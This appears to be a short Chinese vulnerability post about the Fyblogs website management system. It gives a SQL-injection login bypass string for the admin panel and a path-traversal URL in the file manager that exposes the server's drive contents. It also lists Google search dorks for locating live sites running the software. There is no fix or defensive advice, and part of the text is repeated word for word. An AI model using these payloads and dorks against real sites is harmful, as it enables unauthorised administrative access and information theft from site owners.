Fyblogs网站管理系统漏洞

  • A+
所属分类:漏洞时代
摘要

后台万能密码 ‘or’=’or’
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
admin/uploadfile.asp?currentFolder=/upfiles/../

后台万能密码 'or'='or'
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
admin/uploadfile.asp?currentFolder=/upfiles/../

漏洞证明:

谷歌:inurl:type.asp?id=1 新闻中心
或者 :inurl:download_ok.asp?

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: